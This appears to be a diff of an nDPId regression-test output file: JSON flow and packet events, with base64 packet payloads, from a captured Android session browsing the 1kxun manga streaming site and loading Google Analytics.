+00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/analytics.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 04308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1654385143361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2902,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2902,"pkt_l4_len":2868,"thread_ts_msec":1654385143361,"pkt":"nLbQ0+MztKXvZygQCABFAAtIvVUAADsGqouO+rquwKgCfgBQj3yrRpS2wbIHhYAYAQUYCgAAAQEICkxBTaqAUz50SFRUUC8xLjEgMjAwIE9LDQpTdHJpY3QtVHJhbnNwb3J0LVNlY3VyaXR5OiBtYXgtYWdlPTEwODg2NDAwOyBpbmNsdWRlU3ViRG9tYWluczsgcHJlbG9hZA0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KVmFyeTogQWNjZXB0LUVuY29kaW5nDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpDcm9zcy1PcmlnaW4tUmVzb3VyY2UtUG9saWN5OiBjcm9zcy1vcmlnaW4NClNlcnZlcjogR29sZmUyDQpDb250ZW50LUxlbmd0aDogMjAwMDYNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjI6MDc6MzMgR01UDQpFeHBpcmVzOiBTdW4sIDA1IEp1biAyMDIyIDAwOjA3OjMzIEdNVA0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTcyMDANCkFnZTogNDY5MA0KTGFzdC1Nb2RpZmllZDogV2VkLCAxMyBBcHIgMjAyMiAyMTowMjozOCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9qYXZhc2NyaXB0DQoNCh+LCAAAAAAAAv+9vXlX27oWN\/w\/n6L49nLtRoQEKG0T3CxKKaVlaAt0CpQl20pICUmaoUBJns\/+7t+WZMtJOMM7nXVKZE2Wpa2tPctvjDrxsNXt+MH9ypOFhUfb3d5dv9W8HD46uVSPttvdwaivHu23or7s3z3aGg0vu\/1BceHR8YfXX5f3W7HqDNTyXqI6w1ajpfqVR1s9GV+q5dViaeHJysJv2X8kZTi8bA3G44FqN0Q7TF8pRRTcy1AWB712a+h7RS+ookEcSlmV9dJ5q\/MoHo+9USdRjVZHJV4YDu96qtt4FBfVrYqP436rNxyP3SffQxdeAe2DaqPb9\/GcVGWxrTrN4eXSkp\/glZetxtAPgmpgC8bj391W8qgUhmFUi8O4npwvLeHvYhgeRT9VPCz2+t1hFyOg3BqKKvgT3k\/0bzTh4V9PfaEdQ\/yIvicKouKlHBzddD70uz3VH975cUBjkvWYOqA\/wUT8cjrImkdoLoNWw5fTPURB0FfDUb+zWKqaRFmPpR+u\/PBrFfr\/cjjsDWrja9lqD7vjxrAXVMb1H5WV2n\/On1BxHYnx4yBYaVUZEP7FAg\/Dm1Yn6d6IkUkUabmH3f6d+B0m3Xh0TY3FTdiRv1tNSfnidmqGfhdlkuz8pmr71FB1VL82m4WqYrEcVKhoOKQxcOnSUu7R97odWnvqVH\/\/HS2O+BM6UH5XPNna3d073A3T1HhcP6+mT\/XyebhY0s23wpVKvbT84rzweEW8yo1axDnYXfIcYAtL1WTTwlU1KRToEylfhZLAxLYIqQUtZqLibqJOP+1td6973Q6+QQF0i33Va8tY+StnhZWm8B55ASDTLPSjKFTFQZuWxy8HxZ\/dVoc7FHEtqszpMZrX3WQidqYWIiJIjMLjYb\/VaaLRsLvfvVH9bTlQ2Cs0XI\/3QNxtexgNbc5etz\/kNG0kWxZu+9lDMB5v+8NiuxtLvCjLr2Zta1Sd0vbNh6PrCAtevOwOhh15rUx5xe2Gnqlr3wNgUyfZC2vPSxXOHeSz19fXKp4XBFRI3fJ7sfHSl4ROejxecN5lc7NZ3BLU0\/T0mKV5zeChkUn+h\/b26ykgEolQGjoa+Vmr\/s1aDG5aw\/iSCu5jynnkjfrti073otGXTew3r5KEnleVS0v0UX3VMGgPySLtUXV7RGv5H4IYAtaXSU2XVEyFwSgaDPt+SST0Ihkm1aiv5FVVvygFgIoMG7kSntYKNoWdsL+ar2rMY1r5cXNzc5Y8OSuuMBYnlEf4MKEtgMXBBtODQY7ZUTSo3IAARfTaaeCZhpBGDjAaKTzkO5PDS+qsiF8DCC5U\/PExId6KhixTJ5uvclDLsitUrZA9Vh1ssUJ7v7QZ+glQT5AuiKxbpLFcPtengpNB6xlwJ3q7ow935L9Gqn+np3+gZD++TCffq3mY\/qriGX1FgKcsQOa7ULeEaQcEm7qb7Puy81mG5RSz1XLDqwDccp9IK5brPoNNhhE5cIb4Hz1EXZ2OezlqD1HNwu\/EbC45Edu549Hm08SnnVW8WXCj4U3Em1xTPlXD38WYXjpUO211zSeIxGcuLS34Eb85lJYqibK1pM8jsiA2UMpwIWLARSHGHEUP7ACDIu55s+nuhd1P9GyTAq0ruhNhe6pIkUJWLPQSUx2dEJjNCpMWl4JRZcTwP5lU7Rc\/2vUzYkKGb0WEszGmsyrOzqoCjT+qgxg5D2OL0KJJ2seer6eN9sDWq+3XO2923+69e79\/cHj04eOn45PTz1++fvtOcFCgBc5Nf8ErlVfX1p9uPHv+YvnCs13LAkHVBD2+Fe+yob7H8rwN347H9MLqu\/DdeEyjTw\/YKKyfT488LoRremxJGBcyIBWKHlezR1rPYnwp+9t0Rm4NifgSzRD4z80rEJVREpehms5fRf5V2Hj5crXaCP3G0lqwubk+br58uV5thn5zqfyUMlbHly9fblQvl8KNtSohDf8y3FgXtNf9JiWw54q90eDSf1u\/Ohdv6w38aeLPJVF\/ds7NLqdjeiGdlkgyQZg++ld6RV1qQ89Bx3wljRrkh+iF7+qdcxzgnVG7vRj2LB3RQ97iyo\/62eDsVpbOnzxeKQ7VYOh3gmB42e\/ePNrp9+kV3mnnqtO9wRgGamP9keoQkUHo9pEcPsKLKkRyd4KqHf7V5OHVo33i4dipVi1ZFPnL5YBWJvJLWI7Ip1mi6edfjG9jnQ5rotyXy\/Sr7NBjrLlG+sVGv3u9bVbKV1gCWiNqvLG+GDZpiz5Qs0Grt7S6XsIKrgYCtS8frt3c3NxYKr+g5Q0Cop4YK+zz34PQnPNHLqmpN0pM53yYSILXQx\/HbVqhSQSk3ywOZb+piIlpFgf92CCh8fh+QsSCylWO\/rIyr2NMR0lrGNzf+t51dzRQRIt3aK6DKmVcqbtRzz7QiXXdGnpEe1Q17fH25GD\/Tbd\/bfrMWJ2irlr9uwruh0c+GD5a8WIs2239MKnqwYG2nogPc8kgGd6jQSTjK8J2SZeYlc6gEgl7cFRWaf1jwQiVn2NBQHU9qCRiQGjxLbCmmlRpnosggvtgNgZ6r0mazo8zBHxGsefb0MwTbmwQjDY2kww3NvSaEsLApl24xJxfhosx1oMHEsjK\/WXYLJqh89xehVJ0wsVFWjIzRm5GYNYZj6\/oFPk9h9AM7Mh6NIbe5qUdQ482M1rXe8QcD4ayE4Mb\/qSaO7e94N6U6A18FQQ0FuII+Uylg3Oi2nQKUx2iPK5SmgMNiErqLC1RNre2JTMd0EN5goHjE9NFEJZttiV2tWqrlTK2MdPZ174SzaJdXR8byGxj5RxRh+muudfbKwqHxWa322yri6FsXiRyKKszOaHDuMtKROfvbKOIEGKzDaI6ctaZUDKdgtlzpX4+EahI7Ex2+vFIlAxX\/OKTWnD2JPsJVkQD+fUfxD0XAv+sVv9B\/HRQ8\/9DhbWV7Ms+ObRKR92YJfM97sv\/MV4KiFYseCF1tUQdLNXQOyF\/vPpkml1mJEpHYMI4NXlYMED0u8N5VvU8EcgRJahC\/tHHAVJevctSjkda2HEOAkfRIW7IapCjsd5LCdE6OvXeN6UEsbSihOzMsfUEohz7NnAyhPRvexdeISJkeCnr0TnNhyD6rkBVC\/VYpD1FQXCedWJXoe6VPXHMbZzSSTU7G4+tOKk+LKaShiLhwP5WEw=="} 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1654385143362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385143362,"pkt":"nLbQ0+MztKXvZygQCABFAAW+vVcAADsGsBOO+rquwKgCfgBQj3yrRp\/KwbIHhYAQAQWF\/QAAAQEICkxBTaqAUz50UOpj1l8TnRcUCYOetK7VH+KNjxqNgRoSXr7hqvuy0xzJJp3ZN8W2SYsDorqKjXaXpjrtxMefIh2IgGTboR+sbJRWyjtrwbLvgGSpEuWHzaiaAG+fVicKt\/p9eeevPt1wT8hSlTJe4oQruFgqJsRUqj5\/qaqKCpIwWSrXkpcvX5Z\/rL14\/nz1xera8\/UKZ1QhSwqTyWQ\/jAj411dfrL\/YeLb64im\/ZIZ2KgRRGFG75z\/26370Y4pECpZWnz49N0vhUzkd11S5FGTgsbahYfUUiPNShv4p5CgtKU7rq+fhT\/yunYdX9Btkm6IlfbspvO23O9vvj08PLna+frh4vXe89Wp\/57XnED8\/\/75yWreNujfZ6tNqEUU\/lYFle9tqXu50hrRf7j7L9kgN\/LoHero1pC0w6itiJK5pFtr0G7WGHTUYUIpQ3xDo\/rPqM7MkvJF8Q\/vIPhNHN7xUHd85EemATgd39S8+5Fo6eCPtL8UBb1zBCrgJEBjxQ\/yfxgSv\/ER4F036pMUSSFHmG8PPPgE9VQIxUVXhjh+LjF+zRIIqXksIHT753AFTsrYS9dBYWmrQKmf90Jx3pK8P94mzlF\/0XgXGCoEYNeMfBfazJMEMfYisr58DcRMkVROWhkSFuJBkNHI2T\/Qae6TbrMRvCKKaGuEXPVrRAEGSCoEbYZPOc4vkGxMazGhpaWQn7XgIVGGQp\/1ebFylT9eIvtAkaX9ImjAptPAgALnnR4JmHTxhgpmEoCXftU\/bxNCMHjA\/fRmmCO\/7PI9JzdDJGp1ww\/4dzx7hu8q9izXWCGeAhzOMkJJWpsKiRvs9SXqky3COtJBoJWXeiGnB2VCGuEzRQlhZlcISNeln7bxqxgDUpDYjer\/CYdSgFsd+k5Zet5klJUCuAAOas\/4qbNaaVnxAaJIOY0ZWTeq3uXllkVWzEK4Sj3pFLNN5SBwRJQo0ruy4pv9iBtMO7Tv3iPhqaU0HShR4qKsQEHmlwbxDxJFhna5S6UZQvaJZWMKZSJSSf1UIWeJruZ3C5STJ1iipLZYridkzDbMEsUb7DcO9eF41DhuAbE1RNmg+sXGIrbR7qKpnDVQBnZvVpNYICZAKxLUYgRPwbjkIKs2QYI3ym\/n8qn0TbRqC9WyzfHPJCO\/N0acDrC5RD0QtHbKYS0tPTns9y77TbvxIMF2mHUZHEJKrlKTNieQakvprD6q\/CMxYsHdCeKYBiXRXmg2YCBlUvmcPkOYH1cV4aekXERBMJJxQQtgqMapARmUhvPmABqVJjXvES4kIfLR0WeaezBad5j+238hPnsSHp3lTIlazuN\/TDlj+DcT\/D1p1LUIClHt6URz1la2WgWS2PNkL72Mru5WhqallRlOgFoi+RkVSU2lGbOXOQzoenoWlpbgoucBiCmp1rYaX3cQuviupxSfQYYnPpkHhhKETsp0cEuIYsPLELpCibT3NNjWs+kOzTeisWWR5e0hjvCegVcOtIU1QNCK06P3GMewRfNIpZBEGsS5EqSezorpWpzcaQog91Qmmmc68y1aSqM6ccrzeI0CZKUjfTjMtCfw7yTa+FIQ0s09ez6gOktyimLmcWgadywvhrETMRzowuIO7o7BcKuG8LBEC1SejWXpJVGaiGND04bvyQ\/q1Cs1DUHu80srOTAenQ3TbpwnCAlWj5eVJHILOByimR0OcShurLBOvALfRV2kBuX4aj7\/R6RVnbKnFrAqYNTtp0y\/icbuAFdHB+CbLE1pHEFQ1CrLdxYyo2wRkea6NGLFX\/VbSVEU5GnbpBJ8jMzjygxxf4x+EKqiuae4GdGD1A1fPqBlsXvCmYnExAQqaBH\/56p4cDCAJGzUvZ0cw9f6E35\/od9ZfO9SZ+XLgs3PoMRdjJP\/m1YYxVdPvBZs="} 01475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1654385144741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":817,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":817,"pkt_l4_len":783,"thread_ts_msec":1654385144741,"pkt":"tKXvZygQnLbQ0+MzCABFAAMjlA1AAEAGMg\/AqAJ+oXUNHbFmAFDqwyHzbdxUrIAYAfV0zgAAAQEICrrGJc+XERimR0VUIC9pbWFnZXMvZGV0YWlsX3JldmlzaW9uL2dvX3BheW1lbnQucG5nIEhUVFAvMS4xDQpIb3N0OiBtYW5nYXdlYi4xa3h1bi5tb2JpDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6IGltYWdlL3dlYnAsaW1hZ2UvYXBuZyxpbWFnZS8qLCovKjtxPTAuOA0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvb2tpZTogX19xY193SWQ9NDcyOyBwZ3ZfcHZpZD0xNTc5MTk5MjgwOyBhY2Nlc3NfdG9rZW49bnVsbDsgX19nYWRzPUlEPWZjMGYyMmY3OGQ4MmZiNDQtMjJjNDllMTdhOGNkMDBjMTpUPTE2NTQzODUxNDM6UlQ9MTY1NDM4NTE0MzpTPUFMTklfTVlxQy1PUjQwVGFRTFBJdTd2aGtaLS1VMXRtLVE7IF9nYT1HQTEuMi42OTQ1MjQ1MjguMTY1NDM4NTE0MjsgX2dpZD1HQTEuMi4yMDQ5ODYxNjI3LjE2NTQzODUxNDM7IF9nYXQ9MTsgX2dhdF9ndGFnX1VBXzE1NDc1NzkyOV81Nz0xDQoNCg=="} 01459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1654385144744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":806,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":806,"pkt_l4_len":772,"thread_ts_msec":1654385144744,"pkt":"tKXvZygQnLbQ0+MzCABFAAMYAsNAAEAGw2TAqAJ+oXUNHbFMAFBD8zDZwu0\/vYAYAfV0wwAAAQEICrrGJdKXERh6R0VUIC9pbWFnZXMvYm90dG9tZG93bmxvYWQ1LmpwZyBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb29raWU6IF9fcWNfd0lkPTQ3MjsgcGd2X3B2aWQ9MTU3OTE5OTI4MDsgYWNjZXNzX3Rva2VuPW51bGw7IF9fZ2Fkcz1JRD1mYzBmMjJmNzhkODJmYjQ0LTIyYzQ5ZTE3YThjZDAwYzE6VD0xNjU0Mzg1MTQzOlJUPTE2NTQzODUxNDM6Uz1BTE5JX01ZcUMtT1I0MFRhUUxQSXU3dmhrWi0tVTF0bS1ROyBfZ2E9R0ExLjIuNjk0NTI0NTI4LjE2NTQzODUxNDI7IF9naWQ9R0ExLjIuMjA0OTg2MTYyNy4xNjU0Mzg1MTQzOyBfZ2F0PTE7IF9nYXRfZ3RhZ19VQV8xNTQ3NTc5MjlfNTc9MQ0KDQo="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385145219,"pkt":"tKXvZygQnLbQ0+MzCABFAAJCODJAAEAGpmnAqAJ+DoiIbMDKAFAaK2fhcSXy2YAYAfZcTwAAAQEICh66UtmaCR0vR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zLzdlMDdkNDQxN2UwZWRjOThkMzI3ZDBkZGZkM2UyMjdhLmpwZz9mb3JtYXQ9d2VicCBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/7e07d4417e0edc98d327d0ddfd3e227a.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1799,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385145219,"flow_last_seen":1654385145219,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385145219,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/7e07d4417e0edc98d327d0ddfd3e227a.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1654385145426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385145426,"pkt":"nLbQ0+MztKXvZygQCABFAAFR7yVAADYG+mYOiIhswKgCfgBQwMpxJfLZGitp74AYAHpi3wAAAQEICpoJHgAeulLZSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS93ZWJwDQpDb250ZW50LUxlbmd0aDogNTE0MTANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDhhODdiMGI5MmUyNTEwNmMzMjliMDZhZjIwNWQwM2ZlMGMxMzQ0MTYNCg0K"} 02470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1654385145427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385145427,"pkt":"nLbQ0+MztKXvZygQCABFAAXU7yZAADYG9eIOiIhswKgCfgBQwMpxJfP2Gitp74AQAHr0DwAAAQEICpoJHgAeulLZUklGRsrIAABXRUJQVlA4IL7IAACwgwKdASqyAToCPm0ukkckIiGoKnYMwQANiWNs4jJjEcRbUIq4meIOWNjdqsESz8mAKOq361AtvR7TyuOV\/FV+nu87n88t7L\/y+wvnw+sX\/mdCD\/3\/RT9Gzq4ehu9bb9w8kHll+e9cv5x9n\/s\/8T+6\/+L+Zr9RyV9nP\/f\/sPUr+gfkP+N\/i\/yV+gP+H\/5PDX9i\/rv\/N6hf51\/YP91\/gf3j+PH9Ltt+h\/4\/\/f\/1PsKe\/H3v\/q\/5X8ofjU+\/\/9X+09ZP3T\/W\/+j3BP6f\/c\/+d\/gPc\/\/veKD+d\/4v7f\/AX\/VP8R\/7v9b7wX+P\/9v95\/v\/XH+v\/6P\/4f6v4Hf6J\/e\/+5\/i\/9R78n\/\/94\/7k\/\/P3kf2u\/+aAeCI79ZBcTyL6FXzyW9028ZWAO9Y8tIvqAIrZhjGagOgbNZzx4a6g3twV75qnqJ5twB\/xSo9lyhWqAukiBEUGyCjsjBRJTgwuYIYsVFniixVPbFltIkOLqUYdE93iFQWbjfQ7rIyOY3O5mgQ2g1BiHiZ9bXVyF0IzVT9VXeN907YTxHk6r5NzA3ch1aLti4lm405dFkbfhla6HiLq7w41FEOShUP3PJLBCrZnBsm0qQk35PgdMzn956e1LpfIDX0FJREMP+uxg3d994VFpfGq86cjUxtVSP\/VQnXBg+DocX7W4D0RyIXgbm8uQ4IzIF2H1sjFucXdojor47tUm9O7eXpNRair3WOKxEZWb\/iXb2Gdx8LFruVjwxae5wQ8X64uRyQlGCU\/MsLFg09o9l7MyDVDZdrr7hCHFleRA42vaN+i4ay+M2WgHNNilmF4lQlpD\/1Da8lz9y5OpfD5ZCskMypGVzwVXUzSXXPcH1xSjpIRnUOSRLgsSqw+WqdbS7avhXOERtYG+yagD03SLlu\/BR\/ZfU\/3gPUWeJZe7VCByIU4208cLe6TVBR15KafU9Q\/xj5lUs9JNPZyUkF56E+AJuZNQBJnlS1a9fO6Diuf3dw3IKITFUh0AdSeLQqpBmoaOhbagSyTYLzhnNCjxfodnJuIkBQlanUOuHTOD+gs05PVNpU3DHxUIfcFt1gasaZ3w1i7zAZSZ63LdYyL9U2tEDVq9IaI2kL0JUh4JlWYuaXYZlW4pCma\/Fdw\/FL\/jAwnb\/BebCkumQFYP1viY59L1oZu5uBXUXUFkbOOnSUg7MPEnnqZjZfMpX0LF0EK4VWYlPgy+y44jS0OUPRSTYo+1AE\/OT+KFCu4C7y\/0unbMhKRion5VmX+5nuPa3a6IcVtwHpZhpAMBfyTfobyM\/iO\/I77R0vOLjKqAf\/fU6WFG4HV+7sPQY02hCYWp+K0qNzoA68F73HIvfAF03DsfxXnu2yp6t2N0K1eVD7O6DfnUmItqYh3PyLZPd5Q\/FLPxQ2pHJVZC4+JG3pg3Dku0is9oPVCW0EgFqU1QhLG95w0MhoSdR370ILv+yujpCB6gPCExiI4GyrfuzXCHzq6CvQmxoFDHDNmRcmg549qdQpED\/RtK9yoBkpxaQ9X\/7hWB5LDO7ZW5tTeh+5UctrqABpjMUqSP997gQPvkdf8NCjy1lYMvVGbDisirszrLGlJOgO3iwZJ0o2P8WQGmUI7PzSPM5Vu4xYpdQj7L372UKH7ioIJNWGWBaj7O3PoZW0hC6TyDtX5M9DRfs8Y61gVLbj287hc1o5LglFp9sXTiZ5OCimSuIzhhbFCbW9ZN2CPHmUCgr\/jteFqfBjH8xDTm01ggd7scl60snvryXBjlpgXsATeRhvUkemJliJ28laLpSLWqqBShAH527w2WjK\/rZ45PZOBjOOIh39ANRjmTK2EMsRJJtZOA8PZ5a\/rb2q1VS8gz50Lm8EcvkppQ6mj6ubw+11r8Mf\/N+U41JXiGxtOmSVZ3lt8bBEKNl8"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 